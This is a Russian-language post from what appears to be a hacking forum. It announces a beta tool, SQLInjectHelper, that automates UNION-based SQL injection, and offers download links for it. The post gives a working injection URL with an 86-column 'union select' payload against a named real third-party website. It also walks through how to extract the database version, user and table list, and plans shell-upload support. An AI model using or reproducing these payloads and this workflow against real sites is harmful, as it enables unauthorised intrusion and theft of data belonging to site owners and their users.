• XSS.stack #1 – первый литературный журнал от юзеров форума

SQLInjectHelper

Отслеживать
baltazar

baltazar

RAID-массив
Пользователь
Регистрация
26.01.2008
Сообщения
73
Реакции
0
На одном из сайтов обнаружил инъекцию. Стал вычислять количество полей в таблице. Их оказалось 86 :confused: :eek: . Набирать столько полей в строке адреса, а потом ещё и как-то работать с ними жутко неудобно. Решил я это дело автоматизировать. В процессе такой автоматизации и родилась программма SQLInjectHelper.
Пока что это бета версия и многого задуманного программа пока не делает. Почему выкладываю недоделанную версию, спросите вы? Ответ: Не хочу делать много, потому что потом скорее всего придется переделывать все под Ваши желания (возможно менять архитектуру построения программы). Хочу, чтобы вы высказали свои пожелания по возможным дополнениям, покритиковали и.. в общем все как полагается к новой программе.
Итак, скрин:

screensg0.png


В первом поле ввода предлагается ввести уязвимый урл.
Чтобы нам всем было проще, будем рассматривать все на практическом примере: http://englishspectrum.net/
Перед использованием программы от вас потребуется узнать количество колонок в запросе. Для нашего примера их 86 ))).
Итак. Наш уязвимый урл:
http://englishspectrum.net/jobkorea/findpe...ode=view&id=-99 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/*&lc=&sc=&mc=&pp=&gid=1&&&search_YN=Y
Далее, мы должны выбрать какую-либо видимую колонку, в которой будут отображаться результаты запроса. В моем случае я выбрал 52. Для этой колнки мы должны составить регулярное выражение, по которому наша программа сможет выделить её из основного html. В моем случае это было f'>(.*?)\s-\s53
Место, где должна быть инъекция, заменяем на {INJECT}.
http://englishspectrum.net/jobkorea/findpe...ode=view&id=-99 {INJECT}&lc=&sc=&mc=&pp=&gid=1&search_YN=Y
Вводим полученный урл в первое поле ввода.
Во второе поле ввода вводим наше регулярное выражение. Далее вводим количество колонок в запросе и номер отображаемой колонки. Внутрь неё мы будем складывать результаты запросов. Все что нам остается нажать кнопку Start и ждать результатов!

Текущие возможности (бета версия, только базовый набор, очень базовый :) ):
Получение версии MySQL
Получение имени текущей БД и юзера
Получение списка всех таблиц (для MySQL >= 5)
Работа через прокси (пока хз когда сделаю)
В планах:
Список колонок для таблицы (будет скорее всего отдельной формой)
Определение привилегий юзера
Заливка шела
Ничего слушать про то, что такое уже есть не хочу! Не хочу потому что:
1. это только начало, программа ещё сильно обрастет
2. Автоматизация никогда не вредна.
3. Смотри первые 2 пункта.

Программа написана на C#, поэтому нужен 2й фреймворк.

© groupby

Скачать | Download: ~ 38 Кб

DepositFiles
RapidShare
WebFile
Ifolder
Dump
Slil
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх